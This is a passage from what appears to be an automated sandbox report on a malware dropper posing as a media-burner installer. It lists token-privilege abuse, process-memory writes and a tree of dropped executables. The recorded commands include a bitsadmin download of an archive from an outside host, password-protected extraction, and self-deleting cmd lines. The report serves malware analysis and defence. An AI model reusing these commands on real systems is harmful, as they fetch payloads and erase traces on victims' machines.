Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe
Token: SeSystemEnvironmentPrivilege	2676	svchost.exe
Token: SeUndockPrivilege	2676	svchost.exe
Token: SeManageVolumePrivilege	2676	svchost.exe
Token: SeAuditPrivilege	2332	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe
Token: SeSystemEnvironmentPrivilege	2676	svchost.exe
Token: SeUndockPrivilege	2676	svchost.exe
Token: SeManageVolumePrivilege	2676	svchost.exe
Token: SeAuditPrivilege	2332	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe
Token: SeSystemEnvironmentPrivilege	2676	svchost.exe
Token: SeUndockPrivilege	2676	svchost.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
3644	ultramediaburner.tmp
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
764	MicrosoftEdge.exe
4800	MicrosoftEdgeCP.exe
4800	MicrosoftEdgeCP.exe
4916	google-game.exe
4916	google-game.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
8	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 852 wrote to memory of 3884	852	Install.exe	75
PID 852 wrote to memory of 3884	852	Install.exe	75
PID 852 wrote to memory of 3884	852	Install.exe	75
PID 3884 wrote to memory of 3264	3884	Install.tmp	76
PID 3884 wrote to memory of 3264	3884	Install.tmp	76
PID 3264 wrote to memory of 4056	3264	Ultra.exe	79
PID 3264 wrote to memory of 4056	3264	Ultra.exe	79
PID 3264 wrote to memory of 4056	3264	Ultra.exe	79
PID 4056 wrote to memory of 3644	4056	ultramediaburner.exe	80
PID 4056 wrote to memory of 3644	4056	ultramediaburner.exe	80
PID 4056 wrote to memory of 3644	4056	ultramediaburner.exe	80
PID 3264 wrote to memory of 1032	3264	Ultra.exe	81
PID 3264 wrote to memory of 1032	3264	Ultra.exe	81
PID 3644 wrote to memory of 2108	3644	ultramediaburner.tmp	83
PID 3644 wrote to memory of 2108	3644	ultramediaburner.tmp	83
PID 3264 wrote to memory of 2808	3264	Ultra.exe	82
PID 3264 wrote to memory of 2808	3264	Ultra.exe	82
PID 2808 wrote to memory of 4284	2808	Cowaewishyca.exe	89
PID 2808 wrote to memory of 4284	2808	Cowaewishyca.exe	89
PID 4284 wrote to memory of 4468	4284	cmd.exe	91
PID 4284 wrote to memory of 4468	4284	cmd.exe	91
PID 4284 wrote to memory of 4468	4284	cmd.exe	91
PID 2808 wrote to memory of 5052	2808	Cowaewishyca.exe	93
PID 2808 wrote to memory of 5052	2808	Cowaewishyca.exe	93
PID 5052 wrote to memory of 4224	5052	cmd.exe	96
PID 5052 wrote to memory of 4224	5052	cmd.exe	96
PID 5052 wrote to memory of 4224	5052	cmd.exe	96
PID 4800 wrote to memory of 4292	4800	MicrosoftEdgeCP.exe	95
PID 4800 wrote to memory of 4292	4800	MicrosoftEdgeCP.exe	95
PID 4800 wrote to memory of 4292	4800	MicrosoftEdgeCP.exe	95
PID 2808 wrote to memory of 2588	2808	Cowaewishyca.exe	97
PID 2808 wrote to memory of 2588	2808	Cowaewishyca.exe	97
PID 2588 wrote to memory of 4916	2588	cmd.exe	99
PID 2588 wrote to memory of 4916	2588	cmd.exe	99
PID 2588 wrote to memory of 4916	2588	cmd.exe	99
PID 4800 wrote to memory of 4292	4800	MicrosoftEdgeCP.exe	95
PID 4800 wrote to memory of 4292	4800	MicrosoftEdgeCP.exe	95
PID 4800 wrote to memory of 4292	4800	MicrosoftEdgeCP.exe	95
PID 4916 wrote to memory of 4732	4916	google-game.exe	100
PID 4916 wrote to memory of 4732	4916	google-game.exe	100
PID 4916 wrote to memory of 4732	4916	google-game.exe	100
PID 4732 wrote to memory of 1048	4732	rundll32.exe	68
PID 4732 wrote to memory of 2560	4732	rundll32.exe	29
PID 1048 wrote to memory of 4132	1048	svchost.exe	101
PID 1048 wrote to memory of 4132	1048	svchost.exe	101
PID 1048 wrote to memory of 4132	1048	svchost.exe	101
PID 4732 wrote to memory of 296	4732	rundll32.exe	61
PID 4732 wrote to memory of 2388	4732	rundll32.exe	31
PID 4732 wrote to memory of 2332	4732	rundll32.exe	33
PID 4732 wrote to memory of 1076	4732	rundll32.exe	56
PID 2808 wrote to memory of 5108	2808	Cowaewishyca.exe	147
PID 2808 wrote to memory of 5108	2808	Cowaewishyca.exe	147
PID 4732 wrote to memory of 964	4732	rundll32.exe	58
PID 4732 wrote to memory of 1456	4732	rundll32.exe	49
PID 4732 wrote to memory of 1896	4732	rundll32.exe	40
PID 4732 wrote to memory of 1268	4732	rundll32.exe	52
PID 2808 wrote to memory of 4848	2808	Cowaewishyca.exe	105
PID 2808 wrote to memory of 4848	2808	Cowaewishyca.exe	105
PID 4732 wrote to memory of 1260	4732	rundll32.exe	53
PID 4732 wrote to memory of 2676	4732	rundll32.exe	25
PID 4732 wrote to memory of 2684	4732	rundll32.exe	24
PID 5108 wrote to memory of 3700	5108	Conhost.exe	108
PID 5108 wrote to memory of 3700	5108	Conhost.exe	108
PID 5108 wrote to memory of 3700	5108	Conhost.exe	108

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
- Modifies registry class
PID:964
- C:\Users\Admin\AppData\Roaming\hdacjsh
  C:\Users\Admin\AppData\Roaming\hdacjsh
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6076
- C:\Users\Admin\AppData\Roaming\euacjsh
  C:\Users\Admin\AppData\Roaming\euacjsh
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5604
- - C:\Users\Admin\AppData\Roaming\euacjsh
    C:\Users\Admin\AppData\Roaming\euacjsh
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:5320
- C:\Users\Admin\AppData\Roaming\hdacjsh
  C:\Users\Admin\AppData\Roaming\hdacjsh
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5308
- C:\Users\Admin\AppData\Roaming\euacjsh
  C:\Users\Admin\AppData\Roaming\euacjsh
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1816
- - C:\Users\Admin\AppData\Roaming\euacjsh
    C:\Users\Admin\AppData\Roaming\euacjsh
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:1700
- C:\Users\Admin\AppData\Roaming\hdacjsh
  C:\Users\Admin\AppData\Roaming\hdacjsh
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:5588
- C:\Users\Admin\AppData\Roaming\euacjsh
  C:\Users\Admin\AppData\Roaming\euacjsh
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5668
- - C:\Users\Admin\AppData\Roaming\euacjsh
    C:\Users\Admin\AppData\Roaming\euacjsh
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:5944

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:852
- C:\Users\Admin\AppData\Local\Temp\is-1MJ66.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-1MJ66.tmp\Install.tmp" /SL5="$2011C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Users\Admin\AppData\Local\Temp\is-TPGTC.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-TPGTC.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3264
  - - C:\Program Files\Windows Mail\VGJTYDJXSZ\ultramediaburner.exe
      "C:\Program Files\Windows Mail\VGJTYDJXSZ\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Users\Admin\AppData\Local\Temp\is-8BBP3.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8BBP3.tmp\ultramediaburner.tmp" /SL5="$60060,281924,62464,C:\Program Files\Windows Mail\VGJTYDJXSZ\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3644
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:2108
  - - C:\Users\Admin\AppData\Local\Temp\48-996ea-22a-ed8b4-897a4d72bf257\Kipuxesuve.exe
      "C:\Users\Admin\AppData\Local\Temp\48-996ea-22a-ed8b4-897a4d72bf257\Kipuxesuve.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:1032
  - - C:\Users\Admin\AppData\Local\Temp\ea-172e5-73b-4a192-554d40e9d32dc\Cowaewishyca.exe
      "C:\Users\Admin\AppData\Local\Temp\ea-172e5-73b-4a192-554d40e9d32dc\Cowaewishyca.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2808
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyrdiesc.ehk\instEU.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4284
      - C:\Users\Admin\AppData\Local\Temp\cyrdiesc.ehk\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\cyrdiesc.ehk\instEU.exe
        6⤵
        Executes dropped EXE
        
        PID:4468
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\05gigwxv.41s\md1_1eaf.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5052
      - C:\Users\Admin\AppData\Local\Temp\05gigwxv.41s\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\05gigwxv.41s\md1_1eaf.exe
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:4224
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5lmcur4i.bvy\google-game.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2588
      - C:\Users\Admin\AppData\Local\Temp\5lmcur4i.bvy\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\5lmcur4i.bvy\google-game.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4916
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        7⤵
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4732
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pz1wvabv.syt\y1.exe & exit
        5⤵
        
        PID:5108
      - C:\Users\Admin\AppData\Local\Temp\pz1wvabv.syt\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\pz1wvabv.syt\y1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\7gBBs6Jjn0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7gBBs6Jjn0.exe"
        7⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Roaming\1619209509053.exe
        
        "C:\Users\Admin\AppData\Roaming\1619209509053.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619209509053.txt"
        8⤵
        Executes dropped EXE
        
        PID:4444
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\7gBBs6Jjn0.exe"
        8⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:5496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\pz1wvabv.syt\y1.exe"
        7⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:6008
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\altswvsb.azt\inst.exe & exit
        5⤵
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\altswvsb.azt\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\altswvsb.azt\inst.exe
        6⤵
        Executes dropped EXE
        
        PID:416
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o2aiswwv.l3z\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:3544
      - C:\Users\Admin\AppData\Local\Temp\o2aiswwv.l3z\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\o2aiswwv.l3z\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:4760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:4548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:5108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:692
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:5612
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pmmxF8bmyU8wzHT7 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5496
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:1820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\aGDncOmoe\aGDncOmoe.dll" aGDncOmoe
        7⤵
        Loads dropped DLL
        
        PID:5752
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\aGDncOmoe\aGDncOmoe.dll" aGDncOmoe
        8⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:6132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:5220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnFF09.tmp\tempfile.ps1"
        7⤵
        
        PID:5700
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:200
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfdbkj5j.ues\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:4456
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\243xbll4.ed5\toolspab1.exe & exit
        5⤵
        
        PID:5572
      - C:\Users\Admin\AppData\Local\Temp\243xbll4.ed5\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\243xbll4.ed5\toolspab1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\243xbll4.ed5\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\243xbll4.ed5\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        
        PID:5368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oquvvjgq.bxc\c7ae36fa.exe & exit
        5⤵
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\oquvvjgq.bxc\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\oquvvjgq.bxc\c7ae36fa.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:6044
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1v5v5kl.jih\app.exe /8-2222 & exit
        5⤵
        
        PID:4924
      - C:\Users\Admin\AppData\Local\Temp\p1v5v5kl.jih\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\p1v5v5kl.jih\app.exe /8-2222
        6⤵
        Executes dropped EXE
        
        PID:580
        
        C:\Users\Admin\AppData\Local\Temp\p1v5v5kl.jih\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p1v5v5kl.jih\app.exe" /8-2222
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:6120

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:764

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3796

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4080

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4312

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4840

C:\Users\Admin\AppData\Local\Temp\EFFE.exe
C:\Users\Admin\AppData\Local\Temp\EFFE.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:5988
- C:\Users\Admin\AppData\Local\Temp\EFFE.exe
  "C:\Users\Admin\AppData\Local\Temp\EFFE.exe"
  2⤵
  - Executes dropped EXE
  PID:4588
- C:\Users\Admin\AppData\Local\Temp\EFFE.exe
  "C:\Users\Admin\AppData\Local\Temp\EFFE.exe"
  2⤵
  - Executes dropped EXE
  PID:4552

C:\Users\Admin\AppData\Local\Temp\F704.exe
C:\Users\Admin\AppData\Local\Temp\F704.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5976
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:4764
- - C:\Users\Admin\AppData\Roaming\508D.tmp.exe
    "C:\Users\Admin\AppData\Roaming\508D.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:5596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "5596" "C:\Users\Admin\AppData\Roaming\508D.tmp.exe""
      4⤵
      PID:2936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID "5596"
        5⤵
        Kills process with taskkill
        
        PID:2704
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5292
- - C:\Users\Admin\AppData\Roaming\538C.tmp.exe
    "C:\Users\Admin\AppData\Roaming\538C.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:4568
- - C:\Users\Admin\AppData\Roaming\54B5.tmp.exe
